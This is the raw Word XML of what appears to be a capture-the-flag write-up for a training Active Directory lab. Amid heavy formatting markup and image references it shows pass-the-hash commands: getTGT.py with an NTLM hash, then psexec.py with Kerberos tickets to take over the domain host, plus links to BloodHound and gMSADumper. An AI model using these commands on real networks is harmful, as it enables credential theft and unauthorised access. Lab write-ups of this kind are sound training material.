        </w:rPr>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Python script will request a TGT and save it as a ccache for a password, hash, or AES key, which can then be injected into the environment to access the requested service.</w:t>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use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getTGT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to generate the ccache and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">KRB5CCNAME</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to pass the ccache file to the requested service. This is a fully remote attack without using a compromised local victim system.</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getTGT.py -hashes :HASH relay.uhclabs/svc_webapp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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KRB5CCNAME=/PATH/svc_webapp.ccache</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psexec.py relay.uhclabs/svc_webapp@EC2AMAZ-HDQ6ICO.relay.uhclabs -k -no-pass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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47"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simply read the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">final flag </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">located on the Administrator’s Desktop =)</w:t>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33700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="53"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headerReference r:id="rId39" w:type="default"/>
      <w:headerReference r:id="rId40" w:type="first"/>
      <w:headerReference r:id="rId41" w:type="even"/>
      <w:footerReference r:id="rId42" w:type="default"/>
      <w:footerReference r:id="rId43" w:type="first"/>
      <w:footerReference r:id="rId44"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E">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="14"/>
    <w:bookmarkEnd w:id="14"/>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70" name="image13.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image13.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F">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0">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5.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image5.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Relay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22.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.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hyperlink" Target="https://bloodhound.readthedocs.io/en/latest/installation/linux.html" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fox-it/BloodHound.py" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.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localhost:7474/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.hackingclub.com/training/training-machines/38"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28.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/micahvandeusen/gMSADumper" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://gettgt.py/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.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 Id="rId2"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9.png"/></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PPfJjMBmtAPJvsXqM1ygMvLtw==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLmt4M3FpMDV5ZGlxMjIOaC5pNzd6cnZpZjIxNWIyDmgudTB5OTJjNTEzeGg1Mg5oLm82cGl1am90bjd2MzIOaC56ZTQ4eHR1MHc1dzEyDmgudjVjeGxuYWV3NnUzMg5oLjg2Mmk1c2V6Ynd5czINaC5taWRvajd4bGZ4YzIOaC5ka3Z4ajVjZ3RzYm8yDmgudXpmYjM0ZHRtN3RoMg5oLjE3NWY1Y3M5NHowbzgAciExaHRIRUZHWE1ZeWpybFZHb3AzTTFUTzJ6V3pkalJua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